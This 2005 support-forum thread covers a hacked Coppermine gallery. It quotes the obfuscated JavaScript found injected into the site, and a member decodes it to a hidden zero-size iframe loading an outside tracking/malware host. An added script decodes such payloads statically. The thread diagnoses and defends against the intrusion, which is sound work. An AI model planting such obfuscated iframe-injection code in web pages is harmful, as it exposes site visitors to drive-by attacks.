Coppermine connects to some other strange url...

Started by maolu, August 23, 2005, 11:19:26 AM

maolu

I noticed it yesterday.

When I open Coppermine's index page, it connects to some other URL, something like http://www.carambadeus.com/.
Today I also noticed that browsing my gallery with Firefox, it asks me for Java Runtime Environment in order to "properly view the page"...

Is this normal?!?!

Joachim Müller

Post a link to your site, how else could we tell?

maolu


maolu

!!!

I found that on top of my page there is THIS:

<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')
</script>


This is JavaScript code I can't find in any of the files of Coppermine, I cannot understand where it is coming from and I'm sure now that this is the reason for the strange request for Java Runtime Environment!!!

Tranz

Worked fine for me. Maybe it's something to do with your computer.

Nibbler

You need to kill that js, it's opening an iframe to somewhere.

maolu

Quote from: Nibbler on August 23, 2005, 11:26:57 PM
You need to kill that js, it's opening an iframe to somewhere.

I know but it's NOT related to my files!
I never put any js into any page...
I suppose it's something with my internet provider, I just wrote them, I hope they'll answer as soon as possible!!!

kegobeer

Well, whoever put that crap on your site got it from here:

http://scriptasylum.com/tutorials/encdec/encode-decode.html

The code is copied verbatim from that website.  Here's what is actually put on your page:

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')

So, the function dF(s) unescapes whatever string is in dF('...').  This is contained in dF:

<iframe src=http://traf.sn-net.info/index.php frameborder=0 width=0 height=0 scrolling=no name=counter></iframe>

More of the same crap is on that website, pretty much causing a repeating loop to the same websites over and over.  Definitely up to no good.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots
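
The decoding walked through in the post above, as an added example that is not part of the original thread: a Node.js script that reverses the dF() wrapper statically, so nothing is evaluated or written to a page, and flags zero-size iframes in the result. The function names are hypothetical; the sample input is the dF('...') call quoted in the thread.

```javascript
// Added example: static decoder for the dF() wrapper quoted in this thread.
// The payload is handled as data only: no eval, no document.write.

// Sample input: the dF('...') call as posted in the thread.
const SAMPLE = "dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')";

// Percent-decoding of %XX sequences, as the legacy unescape() does.
function pctDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Mirror of dF(s): the last character is a digit key, the rest is
// percent-decoded, each char code is lowered by the key, then decoded again.
function decodeDF(arg) {
  const key = arg.slice(-1);
  if (!/^[0-9]$/.test(key)) throw new Error('last character is not a digit key');
  const stage1 = pctDecode(arg.slice(0, -1));
  let stage2 = '';
  for (let i = 0; i < stage1.length; i++) {
    stage2 += String.fromCharCode(stage1.charCodeAt(i) - Number(key));
  }
  return pctDecode(stage2);
}

// Find every dF('...') call in page source and return the decoded markup.
function findDFPayloads(html) {
  const calls = html.matchAll(/\bdF\(\s*(['"])([^'"]*)\1\s*\)/g);
  return Array.from(calls, (m) => decodeDF(m[2]));
}

// List iframes in decoded markup and flag zero-size (invisible) ones.
function hiddenIframes(markup) {
  const attr = (tag, name) => {
    const m = tag.match(new RegExp('\\b' + name + '\\s*=\\s*["\']?([^\\s"\'>]+)', 'i'));
    return m ? m[1] : null;
  };
  return Array.from(markup.matchAll(/<iframe\b[^>]*>/gi), (m) => ({
    src: attr(m[0], 'src'),
    hidden: attr(m[0], 'width') === '0' && attr(m[0], 'height') === '0',
  }));
}

for (const markup of findDFPayloads(SAMPLE)) {
  console.log(markup, hiddenIframes(markup));
}
```

Run against a saved copy of a page's HTML source, the same functions show what each dF() call would have injected without loading anything in a browser.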

maolu

I received a mail from my provider...

They say that probably there has been some sort of hacking of my site and the way to solve it is to change the CHMOD of the Coppermine's dir in order to prevent web users from entering. :o :o >:(

I think they're crazy because thousands of people use html uploads without this kind of problems!!!
I'm waiting for an answer from them....

kegobeer

If you allow other than images, you can cause yourself a bit of grief.  You might want to approve all images before they are viewable - this way you can verify what's been uploaded and delete any odd files.

Joachim Müller

What filetypes do you allow to be uploaded? Never ever allow htm, html, js, asp, php, php3. In fact you should allow pics and that's it. Yes, your site has been hacked. You'll have to find out where the attacker entered: was it a gap you have opened up deliberately, or did they come in through some kind of backdoor (vulnerability).

maolu

I asked my internet provider for this and they say there has been an intrusion on their server.

By now they still don't know how it happened.... >:( :(